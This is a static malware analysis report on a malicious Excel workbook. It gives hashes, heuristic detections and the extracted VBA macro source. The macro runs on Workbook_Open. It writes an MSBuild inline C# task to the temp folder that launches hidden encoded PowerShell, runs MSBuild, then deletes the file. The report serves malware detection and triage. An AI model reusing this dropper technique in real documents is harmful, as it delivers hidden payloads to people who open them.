Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1d3892599165fe64…

MALICIOUS

Office (OOXML)

24.5 KB Created: 2019-08-21 09:57:13 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-05-14
MD5: 25d6e0a4127e0868a44e8ec089857b3d SHA-1: 86978cb9a043019c520b1f400bc570d7bbc34c46 SHA-256: 1d3892599165fe640e91ee3b1693b1dd9dfab4bb16d30a6335e176a51f94f7af
372 Risk Score

Heuristics 10

  • ClamAV: Xls.Dropper.Agent-7132023-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-7132023-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    The macro instantiates a WScript.Shell object; in the extracted script it is used to expand an environment variable (%TMP%) and to Run an external executable.
    Matched line in script
    Set objShell = CreateObject("WScript.Shell")
  • PowerShell reference in VBA critical OLE_VBA_PS
    A string in the VBA source names powershell.exe and assembles an encoded (-enc) command line for it.
    Matched line in script
    a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set objShell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags macro documents whose visible VBA source is unavailable (p-code only, or source extraction failed). The matched tokens are named in the detail line below, when one is rendered.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common social-engineering technique used by malware droppers to persuade the user to lift Office macro security settings, since the macro cannot run until they do
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/developer/msbuild/2003 In document text (OOXML body / shared strings) — this is the MSBuild project-file XML namespace used by the project the macro writes (the a1 string in the extracted script), not a host the sample contacts; do not treat it as a network indicator.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8595 bytes
SHA-256: 2f40ef2e16c1a57241248287ee297a5a6acc59c31cca184bfc058b3598b616b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
#If VBA7 Then
    Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
 #Else
    Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
    
Sub mksrw()
Set objShell = CreateObject("WScript.Shell")

Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim StrFldSearch
StrFldSearch = "C:\Windows\Microsoft.NET\Framework64"
Set RootFolder = oFSO.GetFolder(StrFldSearch)
Set SubFolder = RootFolder.SubFolders

Dim np
For Each folder In SubFolder
strFolder = StrFldSearch & "\" & folder.Name & "\MSBuild.exe"
If oFSO.FileExists(strFolder) Then
np = StrFldSearch & "\" & folder.Name & "\"
End If
Next

Dim fp
fp = objShell.ExpandEnvironmentStrings("%TMP%\tfi.xml")

Dim b1, b2, b3, b4, b5
b1 = "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"
b2 = "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"
b3 = "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"
b4 = "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"
b5 = "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"

Set fl = CreateObject("Scripting.FileSystemObject")
Set File = fl.CreateTextFile(fp, True)

Dim c1
c1 = "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"

Dim a1, a2, a3, a4
a1 = "<Project ToolsVersion=""4.0"" xmlns=""http://schemas.microsoft.com/developer/msbuild/2003""><Target Name=""34rfas""><QWEridxnaPO /></Target><UsingTask TaskName=""QWEridxnaPO"" TaskFactory=""CodeTaskFactory"" AssemblyFile=""C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"" ><Task><Reference Include=""System.Management.Automation"" /><Code Type=""Class"" Language=""cs""><![CDATA[ using System;using System.IO;using System.Diagnostics;using System.Reflection;using System.Runtime.InteropServices;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Text;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class QWEridxnaPO :  Task, ITask {public override bool Execute() {"
a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
a3 = "ProcessStartInfo startInfo = new ProcessStartInfo(""powershell.exe"");startInfo.WindowStyle = ProcessWindowStyle.Minimized;startInfo.Arguments = ""-noP -sta -w 1 -enc " & b1 & b2 & b3 & b4 & b5 & """;Process.Start(startInfo);"
a4 = "return true;}}]]></Code></Task></UsingTask></Project>"

File.Write a1 & a2 & a3 & a4

File.Close

objShell.Run (np & "MSBuild.exe" & " " & fp)
Sleep (2000)

fl.DeleteFile (fp)

End Sub



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
mksrw
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 28672 bytes
SHA-256: 1717dbde530376e4acc9427bc3e26dbc81015c6c881befe4fca1667452f55675
Detection
ClamAV: Xls.Dropper.Agent-7132023-0
Obfuscation or payload: likely
Carved artifact contains 6 long base64-like blob(s).